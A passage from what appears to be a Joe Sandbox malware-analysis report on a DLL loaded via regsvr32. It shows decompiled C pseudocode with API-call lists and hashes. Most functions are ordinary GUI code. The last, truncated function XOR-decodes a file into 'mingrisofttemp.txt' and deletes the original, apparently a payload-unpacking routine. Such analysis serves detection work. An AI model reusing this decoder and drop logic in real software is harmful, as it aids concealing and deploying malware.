				} else {
					_t43 = 0;
				}
				_push(_t83);
				_t75 =  &_v12;
				_t84 = E10021616(_t43,  &_v12);
				 *(_t86 + 0x5c) = _t84;
				_v24 = 0;
				if(_t84 != 0 && IsWindowEnabled(_t84) != 0) {
					EnableWindow(_t84, 0);
					_v16 = 1;
				}
				_t45 = GetCapture();
				_t94 = _t45;
				if(_t45 != 0) {
					SendMessageA(_t45, 0x1f, 0, 0);
				}
				 *(_t86 + 0x3c) =  *(_t86 + 0x3c) | 0x00000010;
				 *((intOrPtr*)(_t86 + 0x44)) = 0;
				E1001B7F6(_t84, _t94, _t86);
				 *(_t86 + 0x58) =  *(_t86 + 0x58) | 0x00000400;
				 *(_t86 + 0x3c) =  *(_t86 + 0x3c) | 0x00000010;
				_t48 = E1002BB36(_t75, _t86 + 0x54);
				 *(_t86 + 0x58) =  *(_t86 + 0x58) & 0xfffffbff;
				_t70 = _t48;
				E10019CBE(_t70, _t84, _t94);
				if(_t70 == 0 || _t70 == 0xffffffff) {
					 *(_t86 + 0x3c) =  *(_t86 + 0x3c) & 0xffffffef;
				}
				_v8 =  *((intOrPtr*)(_t86 + 0x44));
				if( *((intOrPtr*)( *_t86 + 0x80))() != 0) {
					_t72 = 4;
					if((E1001D23C(_t86) & 0x00000100) != 0) {
						_t72 = 5;
					}
					_v12 = E100197B9(_t86, _t72);
				}
				if( *((intOrPtr*)(_t86 + 0x20)) != 0) {
					E1001D569(_t86, 0, 0, 0, 0, 0, 0x97);
				}
				if(_v16 != 0) {
					EnableWindow(_t84, 1);
				}
				if(_t84 != 0 && GetActiveWindow() ==  *((intOrPtr*)(_t86 + 0x20))) {
					SetActiveWindow(_t84);
				}
				 *((intOrPtr*)( *_t86 + 0x60))();
				_t78 = _v4;
				if(_v4 != 0) {
					E100216B4(_t78, 1);
				}
				if(_v12 != 0) {
					EnableWindow(_v12, 1);
				}
				return _v8;
			}






















                                                                                                                0x1002bb83
                                                                                                                0x1002bb83
                                                                                                                0x1002bb8b
                                                                                                                0x1002bb8d
                                                                                                                0x1002bb97
                                                                                                                0x1002bba0
                                                                                                                0x1002bbab
                                                                                                                0x1002bbb2
                                                                                                                0x1002bbb6
                                                                                                                0x1002bbbb
                                                                                                                0x1002bbbb
                                                                                                                0x1002bbc0
                                                                                                                0x1002bbc8
                                                                                                                0x1002bbce
                                                                                                                0x1002bbca
                                                                                                                0x1002bbca
                                                                                                                0x1002bbca
                                                                                                                0x1002bbd1
                                                                                                                0x1002bbd2
                                                                                                                0x1002bbe3
                                                                                                                0x1002bbe7
                                                                                                                0x1002bbea
                                                                                                                0x1002bbee
                                                                                                                0x1002bbfd
                                                                                                                0x1002bbff
                                                                                                                0x1002bbff
                                                                                                                0x1002bc07
                                                                                                                0x1002bc0d
                                                                                                                0x1002bc0f
                                                                                                                0x1002bc16
                                                                                                                0x1002bc16
                                                                                                                0x1002bc1c
                                                                                                                0x1002bc21
                                                                                                                0x1002bc24
                                                                                                                0x1002bc29
                                                                                                                0x1002bc30
                                                                                                                0x1002bc38
                                                                                                                0x1002bc3d
                                                                                                                0x1002bc44
                                                                                                                0x1002bc46
                                                                                                                0x1002bc4d
                                                                                                                0x1002bc54
                                                                                                                0x1002bc54
                                                                                                                0x1002bc5b
                                                                                                                0x1002bc6b
                                                                                                                0x1002bc6f
                                                                                                                0x1002bc7b
                                                                                                                0x1002bc7f
                                                                                                                0x1002bc7f
                                                                                                                0x1002bc88
                                                                                                                0x1002bc88
                                                                                                                0x1002bc91
                                                                                                                0x1002bc9f
                                                                                                                0x1002bc9f
                                                                                                                0x1002bca8
                                                                                                                0x1002bcad
                                                                                                                0x1002bcad
                                                                                                                0x1002bcb1
                                                                                                                0x1002bcbf
                                                                                                                0x1002bcbf
                                                                                                                0x1002bcc9
                                                                                                                0x1002bccc
                                                                                                                0x1002bcd3
                                                                                                                0x1002bcd7
                                                                                                                0x1002bcd7
                                                                                                                0x1002bce0
                                                                                                                0x1002bce8
                                                                                                                0x1002bce8
                                                                                                                0x1002bcf4

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001C7A2: _memset.LIBCMT ref: 1001C7D0
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 1002BBF1
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1002BBFD
                                                                                                                • GetCapture.USER32 ref: 1002BC07
                                                                                                                • SendMessageA.USER32 ref: 1002BC16
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 1002BCAD
                                                                                                                • GetActiveWindow.USER32 ref: 1002BCB3
                                                                                                                • SetActiveWindow.USER32(00000000), ref: 1002BCBF
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1002BCE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Active$CaptureEnabledMessageSend_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 228322376-0
                                                                                                                • Opcode ID: de6d394cd87c638cc59b3f739f4485a6814f58672fbccdada37cedf09c286cc8
                                                                                                                • Instruction ID: 2c30a4868acd2c0dc7ff9dd73bbc77e2702fccf8ca6efbfdc9b0e17fcf5f407a
                                                                                                                • Opcode Fuzzy Hash: de6d394cd87c638cc59b3f739f4485a6814f58672fbccdada37cedf09c286cc8
                                                                                                                • Instruction Fuzzy Hash: CB41E174200B019FD710EF68DDC9A6EBBE8FF48750F90092DF28697292CBB4EC448A51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021E1F Relevance: 12.1, APIs: 8, Instructions: 85windowstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E10021E1F(void* __eflags) {
				intOrPtr _v4;
				struct HWND__* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t30;
				struct HWND__* _t33;
				intOrPtr _t36;
				intOrPtr _t40;
				int _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t52;
				signed int _t54;
				void* _t62;
				void* _t64;
				signed int _t67;
				void* _t74;

				_t74 = __eflags;
				_t67 = _t54;
				_push(_t62);
				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
				_t52 = 0;
				E1003BB70(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
				_t33 = GetFocus();
				_t63 =  *((intOrPtr*)(_t67 + 0x74));
				_t58 = _t67;
				_v8 = _t33;
				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E10020E9D(0, _t67, _t74);
				E10019CBE(0,  *((intOrPtr*)(_t67 + 0x74)), _t74);
				_t36 =  *((intOrPtr*)(_t67 + 0x74));
				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
					_t52 = 1;
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
				}
				_t64 = E10022C52(_t52, _t63, _t67, 1);
				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
					E1001B7F6(_t64, __eflags, _t67);
				} else {
					 *(_t64 + 0x18) = _t67;
				}
				_push( *((intOrPtr*)(_t67 + 0x74)));
				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
					_t40 = E10021E08(_t58);
				} else {
					_t40 = E10021DF1(_t58);
				}
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				_v4 = _t40;
				if(_t52 != 0) {
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
				}
				_t41 = IsWindow(_v8);
				_t81 = _t41;
				if(_t41 != 0) {
					SetFocus(_v8);
				}
				E10020ED7(_t52, _t67, _t64, _t67, _t81);
				_t43 = _v4;
				if(_t43 == 0) {
					_t44 = 2;
					return _t44;
				}
				return _t43;
			}























                                                                                                                0x10021e1f
                                                                                                                0x10021e24
                                                                                                                0x10021e29
                                                                                                                0x10021e2d
                                                                                                                0x10021e40
                                                                                                                0x10021e46
                                                                                                                0x10021e4e
                                                                                                                0x10021e54
                                                                                                                0x10021e57
                                                                                                                0x10021e59
                                                                                                                0x10021e62
                                                                                                                0x10021e65
                                                                                                                0x10021e6a
                                                                                                                0x10021e76
                                                                                                                0x10021e8d
                                                                                                                0x10021e8e
                                                                                                                0x10021e8e
                                                                                                                0x10021e95
                                                                                                                0x10021ea1
                                                                                                                0x10021ea9
                                                                                                                0x10021ea3
                                                                                                                0x10021ea3
                                                                                                                0x10021ea3
                                                                                                                0x10021eb2
                                                                                                                0x10021eb5
                                                                                                                0x10021ebe
                                                                                                                0x10021eb7
                                                                                                                0x10021eb7
                                                                                                                0x10021eb7
                                                                                                                0x10021ec3
                                                                                                                0x10021ec9
                                                                                                                0x10021ecd
                                                                                                                0x10021ed7
                                                                                                                0x10021ed7
                                                                                                                0x10021edd
                                                                                                                0x10021ee3
                                                                                                                0x10021ee5
                                                                                                                0x10021eeb
                                                                                                                0x10021eeb
                                                                                                                0x10021ef3
                                                                                                                0x10021ef8
                                                                                                                0x10021f02
                                                                                                                0x10021f06
                                                                                                                0x00000000
                                                                                                                0x10021f06
                                                                                                                0x10021f09

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,100035EC,00000001,10056FBC,00000000,00000004,FILE(*.txt)|*.txt||,00000000,00000000,DF7C0CDA), ref: 10021E2D
                                                                                                                • _memset.LIBCMT ref: 10021E46
                                                                                                                • GetFocus.USER32 ref: 10021E4E
                                                                                                                • IsWindowEnabled.USER32(?), ref: 10021E7B
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 10021E8E
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 10021ED7
                                                                                                                • IsWindow.USER32(?), ref: 10021EDD
                                                                                                                • SetFocus.USER32 ref: 10021EEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableFocus$Enabled_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2950697994-0
                                                                                                                • Opcode ID: 34e488af097f25fa4a4901a76bb1c42e2241d7697c5ad10cd033a353b989e6c5
                                                                                                                • Instruction ID: 3b5bad7034ca4c5e966a79ba62dc1560c0fbabe954891b0be745d6764cf37ffe
                                                                                                                • Opcode Fuzzy Hash: 34e488af097f25fa4a4901a76bb1c42e2241d7697c5ad10cd033a353b989e6c5
                                                                                                                • Instruction Fuzzy Hash: 29218D38200B009FEB11DF20ED89A6ABBE9FF58741F524A2DF95687661DB71F801CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10005610 Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10005610(void* __edx, void* __eflags) {
				char _v4;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v44;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t23;
				intOrPtr* _t27;
				struct HBRUSH__* _t33;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t59;
				LOGFONTA* _t62;
				signed int _t64;
				intOrPtr* _t67;

				_push(0xffffffff);
				_push(E100511C4);
				_push( *[fs:0x0]);
				_push(_t45);
				_t23 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t23 ^ _t64);
				 *[fs:0x0] =  &_v12;
				_t59 = _t45;
				_v16 = _t59;
				E10018895(_t45, __eflags);
				_t43 = _t59 + 0x9c;
				 *_t59 = 0x1005734c;
				_v4 = 0;
				 *((intOrPtr*)(_t43 + 4)) = 0;
				 *_t43 = 0x100572d4;
				_v4 = 1;
				_t27 = E100173A6();
				_t67 = _t27;
				_t47 = 0 | _t67 == 0x00000000;
				if(_t67 == 0) {
					_t27 = E10001000(_t47, __edx, 0x80004005);
				}
				 *((intOrPtr*)(_t59 + 0xa4)) =  *((intOrPtr*)( *((intOrPtr*)( *_t27 + 0xc))))() + 0x10;
				_v4 = 2;
				 *((intOrPtr*)(_t59 + 0x54)) = GetSysColor(8);
				_t33 = CreateSolidBrush(GetSysColor(0xf));
				_t62 = _t59 + 0x60;
				 *(_t59 + 0x58) = _t33;
				GetObjectA(GetStockObject(0x11), 0x3c, _t62);
				E100247F5(_t43, GetSysColor, _t62, CreateFontIndirectA(_t62));
				 *((intOrPtr*)(_t59 + 0xac)) = 0;
				 *((intOrPtr*)(_t59 + 0xa8)) = 0;
				 *((intOrPtr*)(_t59 + 0xb0)) = 1;
				 *((intOrPtr*)(_t59 + 0xb8)) = 0;
				 *((intOrPtr*)(_t59 + 0xb4)) = 0;
				 *((intOrPtr*)(_t59 + 0x5c)) = CreateSolidBrush(GetSysColor(0xf));
				 *[fs:0x0] = _v44;
				return _t59;
			}



















                                                                                                                0x10005610
                                                                                                                0x10005612
                                                                                                                0x1000561d
                                                                                                                0x1000561e
                                                                                                                0x10005623
                                                                                                                0x1000562a
                                                                                                                0x1000562f
                                                                                                                0x10005635
                                                                                                                0x10005637
                                                                                                                0x1000563b
                                                                                                                0x10005642
                                                                                                                0x10005648
                                                                                                                0x1000564e
                                                                                                                0x10005652
                                                                                                                0x10005655
                                                                                                                0x1000565b
                                                                                                                0x10005660
                                                                                                                0x10005667
                                                                                                                0x10005669
                                                                                                                0x1000566e
                                                                                                                0x10005675
                                                                                                                0x10005675
                                                                                                                0x10005686
                                                                                                                0x10005694
                                                                                                                0x1000569d
                                                                                                                0x100056a3
                                                                                                                0x100056a9
                                                                                                                0x100056b1
                                                                                                                0x100056bb
                                                                                                                0x100056cb
                                                                                                                0x100056d4
                                                                                                                0x100056da
                                                                                                                0x100056e0
                                                                                                                0x100056ea
                                                                                                                0x100056f0
                                                                                                                0x100056ff
                                                                                                                0x10005708
                                                                                                                0x10005717

                                                                                                                APIs
                                                                                                                • GetSysColor.USER32 ref: 10005699
                                                                                                                • GetSysColor.USER32 ref: 100056A0
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 100056A3
                                                                                                                • GetStockObject.GDI32(00000011), ref: 100056B4
                                                                                                                • GetObjectA.GDI32(00000000,?,?), ref: 100056BB
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 100056C2
                                                                                                                • GetSysColor.USER32 ref: 100056F6
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 100056F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorCreate$BrushObjectSolid$FontIndirectStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2423990618-0
                                                                                                                • Opcode ID: aff33c15df814b6b40dfe8f69a7c5e60c5347ae22f5931d02fdc0e963ca0e209
                                                                                                                • Instruction ID: decd84fa81e68265d5d06a575d2a90eabd31cf79224aca9c57f36db87637f21d
                                                                                                                • Opcode Fuzzy Hash: aff33c15df814b6b40dfe8f69a7c5e60c5347ae22f5931d02fdc0e963ca0e209
                                                                                                                • Instruction Fuzzy Hash: 9E31AEB15047409FE760DF74CC44B9BBBE8FF88310F01492DE59ACB291DB79A4448B21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025795 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E10025795(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E1002D808(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E1002D808( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                                0x10025798
                                                                                                                0x1002579a
                                                                                                                0x1002579c
                                                                                                                0x100257a4
                                                                                                                0x100257be
                                                                                                                0x100257c6
                                                                                                                0x100257d0
                                                                                                                0x100257d7
                                                                                                                0x100257d9
                                                                                                                0x100257de
                                                                                                                0x100257e1
                                                                                                                0x100257e1
                                                                                                                0x100257f8
                                                                                                                0x100257ff
                                                                                                                0x10025817
                                                                                                                0x1002581c
                                                                                                                0x10025821
                                                                                                                0x10025821
                                                                                                                0x10025827
                                                                                                                0x10025827
                                                                                                                0x100257d7
                                                                                                                0x1002582c
                                                                                                                0x10025830

                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 100257B2
                                                                                                                • lstrcmpA.KERNEL32(?,?), ref: 100257BE
                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 100257D0
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100257F0
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100257F8
                                                                                                                • GlobalLock.KERNEL32 ref: 10025802
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1002580F
                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10025827
                                                                                                                  • Part of subcall function 1002D808: GlobalFlags.KERNEL32(?), ref: 1002D813
                                                                                                                  • Part of subcall function 1002D808: GlobalUnlock.KERNEL32(?,?,00000000,10025821,?,00000000,?,?,00000000,00000000,00000002), ref: 1002D825
                                                                                                                  • Part of subcall function 1002D808: GlobalFree.KERNEL32(?), ref: 1002D830
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 168474834-0
                                                                                                                • Opcode ID: 0f1d27c23d3555b47a502b77b6e162dc62b27fc45dd4ef8bd25957cff7948110
                                                                                                                • Instruction ID: ae63f95331d801131bf0f4906f7ef04ccb0b106fa2c9e0002886c8131a7a42df
                                                                                                                • Opcode Fuzzy Hash: 0f1d27c23d3555b47a502b77b6e162dc62b27fc45dd4ef8bd25957cff7948110
                                                                                                                • Instruction Fuzzy Hash: 1A11A0B5500604BBDB12EBB5EC89C6F7EFDFB89740B404019FA06D2021DA76ED40DB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D07D Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002D07D(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x10070c70 = GetSystemMetrics(2) + 1;
				 *0x10070c74 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}





                                                                                                                0x1002d088
                                                                                                                0x1002d08e
                                                                                                                0x1002d095
                                                                                                                0x1002d09d
                                                                                                                0x1002d0a7
                                                                                                                0x1002d0b8
                                                                                                                0x1002d0c2
                                                                                                                0x1002d0ca
                                                                                                                0x1002d0d6

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D08A
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D091
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D098
                                                                                                                • GetSystemMetrics.USER32 ref: 1002D0A2
                                                                                                                • GetDC.USER32(00000000), ref: 1002D0AC
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002D0BD
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002D0C5
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1002D0CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1151147025-0
                                                                                                                • Opcode ID: 1c82e98017bda58a1abb89799ae7cbf339beabb8b037c5e193e580e13ff8a8a9
                                                                                                                • Instruction ID: 241fd660cf793db7d5212e0abc6a079d6f19d4d6d69d71045c6bd073ba767a1b
                                                                                                                • Opcode Fuzzy Hash: 1c82e98017bda58a1abb89799ae7cbf339beabb8b037c5e193e580e13ff8a8a9
                                                                                                                • Instruction Fuzzy Hash: 9AF0D671A40714AFF720AF719C89F277BA4EB85B51F11461AF6419B1D0DBB5D8018F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100038E0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100038E0(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t108;
				signed int _t109;
				intOrPtr* _t111;
				intOrPtr* _t115;
				void* _t120;
				signed int _t124;
				void* _t130;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				signed int** _t154;
				signed int** _t155;
				signed int _t159;
				char* _t161;
				signed int _t173;
				CHAR* _t180;
				void* _t182;
				signed int _t236;
				signed int _t247;
				signed int _t251;
				signed int _t253;
				signed int _t256;
				intOrPtr _t260;
				void* _t261;
				void* _t263;
				signed int _t265;
				intOrPtr _t266;
				void* _t267;
				signed int _t268;
				void* _t270;
				intOrPtr _t272;
				void* _t273;
				intOrPtr* _t276;
				intOrPtr* _t278;

				_t268 = _t270 - 0x204;
				_push(0xffffffff);
				_push(E10050F18);
				_push( *[fs:0x0]);
				_t272 = _t270 - 0x1b4;
				_t108 =  *0x1006dbdc; // 0xdf7c0cda
				_t109 = _t108 ^ _t268;
				 *(_t268 + 0x200) = _t109;
				_push(_t109);
				 *[fs:0x0] = _t268 - 0xc;
				 *((intOrPtr*)(_t268 - 0x10)) = _t272;
				_t260 = __ecx;
				 *((intOrPtr*)(_t268 - 0x24)) = __ecx;
				_t111 = E100173A6();
				_t276 = _t111;
				_t185 = 0 | _t276 == 0x00000000;
				if(_t276 == 0) {
					_t111 = E10001000(_t185, __edx, 0x80004005);
				}
				_t244 =  *_t111;
				 *(_t268 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0xc))))() + 0x10;
				 *(_t268 - 4) = 0;
				_t115 = E100173A6();
				_t278 = _t115;
				_t188 = 0 | _t278 == 0x00000000;
				if(_t278 == 0) {
					_t115 = E10001000(_t188, _t244, 0x80004005);
				}
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0xc))))() + 0x10; // 0x10
				_t263 = _t14;
				 *(_t268 - 0x20) = _t263;
				 *(_t268 - 4) = 1;
				E1001ADCC(_t260 + 0x78, _t260, _t268 - 0x14);
				if( *((intOrPtr*)( *(_t268 - 0x14) - 0xc)) != 0) {
					_t247 = _t268 - 0x20;
					E10003500(_t247, "%smingrisofttemp.txt",  *((intOrPtr*)(_t260 + 0x74)));
					_t180 =  *(_t268 - 0x20);
					_t273 = _t272 + 0xc;
					_t120 = CreateFileA(_t180, 0x40000000, 2, 0, 1, 0x80, 0);
					__eflags = _t120;
					if(__eflags != 0) {
						CloseHandle(_t120);
					}
					E100205E2(_t268 - 0x34, __eflags);
					 *(_t268 - 4) = 2;
					E100205E2(_t268 - 0x44, __eflags);
					_push(0);
					_push(0);
					_push( *(_t268 - 0x14));
					 *(_t268 - 4) = 3;
					_t124 = E10020A24(_t268 - 0x34, _t247, __eflags);
					_push(0);
					_push(0x1002);
					_push(_t180);
					_t264 = _t124;
					E10020A24(_t268 - 0x44, _t247, __eflags);
					__eflags = _t124;
					if(__eflags != 0) {
						do {
							E1003BB70(_t260, _t268 + 0x180, 0, 0x80);
							E1003BB70(_t260, _t268 + 0x100, 0, 0x80);
							_t273 = _t273 + 0x18;
							_t265 = E100202F0(_t268 - 0x34, _t268 + 0x180, 0x80);
							_t130 = 0;
							__eflags = _t265;
							if(_t265 > 0) {
								do {
									 *(_t268 + _t130 + 0x100) =  *(_t268 + _t130 + 0x180) ^ 0x00000002;
									_t130 = _t130 + 1;
									__eflags = _t130 - _t265;
								} while (_t130 < _t265);
							}
							E10020330(_t268 - 0x44, _t268 + 0x100, _t265);
							__eflags = _t265;
						} while (_t265 != 0);
						E10020580(_t180, _t268 - 0x34);
						E10020580(_t180, _t268 - 0x44);
						_t249 =  *(_t268 - 0x14);
						DeleteFileA( *(_t268 - 0x14));
						E1003BB37(_t180,  *(_t268 - 0x14));
						E1002181C(_t180, _t260, _t265, __eflags, 0x10056fd8, _t265, _t265);
						_t138 = E100173A6();
						__eflags = _t138;
						_t204 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							_t138 = E10001000(_t204, _t249, 0x80004005);
						}
						_t250 =  *_t138;
						_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() + 0x10; // 0x10
						_t266 = _t54;
						 *((intOrPtr*)(_t268 - 0x1c)) = _t266;
						 *(_t268 - 4) = 4;
						_t141 = E100173A6();
						__eflags = _t141;
						_t207 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							_t141 = E10001000(_t207, _t250, 0x80004005);
						}
						_t251 =  *_t141;
						 *(_t268 - 0x18) =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0xc))))() + 0x10;
